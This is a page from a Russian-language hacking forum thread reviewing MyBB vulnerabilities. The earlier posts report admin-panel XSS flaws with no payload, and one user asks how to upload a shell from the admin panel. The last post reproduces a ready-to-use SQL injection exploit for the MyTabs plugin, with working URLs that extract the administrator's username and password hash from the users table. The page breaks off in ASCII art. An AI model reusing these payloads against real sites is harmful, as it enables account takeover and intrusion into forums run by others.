HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу [Обзор уязвимостей myBB]
   
Ответ
Страница 3 из 3 < 1 2 3
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 25.05.2009, 15:42
Nelzone
Постоянный
Регистрация: 12.04.2008
Сообщений: 403
С нами: 9515846

Репутация: 261
По умолчанию
MyBB 1.4.6 3 May 2009

Доступ Админка

Уязвимость существует из-за недостаточной обработки входных данных в URL

xss можно засунуть в Категории & Форума

Решение:http://mybboard.it/forum/thread-3623.html
Последний раз редактировалось Nelzone; 02.07.2009 в 18:47..
 
Ответить с цитированием

  #22  
Старый 02.07.2009, 14:03
Nelzone
Постоянный
Регистрация: 12.04.2008
Сообщений: 403
С нами: 9515846

Репутация: 261
По умолчанию
MyBB 1.4.8 последняя версия 26 June 2009

очередной дырка пока не перекрыли)

Доступ:Админка

Уязвимость существует из-за недостаточной обработки входных данных в URL

xss можно засунуть в Категории & Форума

Решение:пока нету

DEMO:http://sniffers.ueuo.com/
Последний раз редактировалось Nelzone; 02.07.2009 в 18:47..
 
Ответить с цитированием

  #23  
Старый 09.07.2009, 04:15
DIMON4G
Участник форума
Регистрация: 25.05.2008
Сообщений: 201
С нами: 9453915

Репутация: 296
По умолчанию
Цитата:
Сообщение от Nelzone  
MyBB 1.4.8 последняя версия 26 June 2009

очередной дырка пока не перекрыли)

Доступ:Админка

Уязвимость существует из-за недостаточной обработки входных данных в URL

xss можно засунуть в Категории & Форума

Решение:пока нету

DEMO:http://sniffers.ueuo.com/
и где сама уязвимость описана?
 
Ответить с цитированием

  #24  
Старый 13.07.2009, 00:25
Nelzone
Постоянный
Регистрация: 12.04.2008
Сообщений: 403
С нами: 9515846

Репутация: 261
По умолчанию
Цитата:
Сообщение от DIMON4G  
и где сама уязвимость описана?
DEMO:http://sniffers.ueuo.com/
 
Ответить с цитированием

  #25  
Старый 04.09.2009, 22:13
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
С нами: 10533245

Репутация: 773


По умолчанию
а как шелл залить из админке?
 
Ответить с цитированием

  #26  
Старый 03.08.2011, 08:20
абвгдешка
Познающий
Регистрация: 02.05.2011
Сообщений: 48
С нами: 7910966

Репутация: 1
По умолчанию
MyBB MyTabs (plugin) 0day SQL injection vulnerability

[CODE]
================================================== ===================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
================================================== ===================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Vulnerable Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :

$~ http://localhost/mybbpath/index.php?tab=[SQLi]

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -


_ _ ____ _ _ _ _ _ _ ____ _
/ \ _ _| |_ ___ | _ \| | | | \ | | __ _ _ __ __| | __| | _ \ ___ __ _| |
/ _ \| | | | __/ _ \| |_) | | | | \| | / _` | '_ \ / _` | / _` | |_) | / __|/ _` | |
/ ___ \ |_| | |_ (_) | _
 
Ответить с цитированием
Ответ
Страница 3 из 3 < 1 2 3



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей phpBB] qBiN Уязвимости CMS / форумов 115 07.08.2022 16:12
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
[Обзор уязвимостей Phorum] _-[A.M.D]HiM@S-_ Уязвимости CMS / форумов 11 23.05.2010 13:42
[Обзор уязвимостей Ikonboard] _-[A.M.D]HiM@S-_ Уязвимости CMS / форумов 6 26.12.2007 19:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...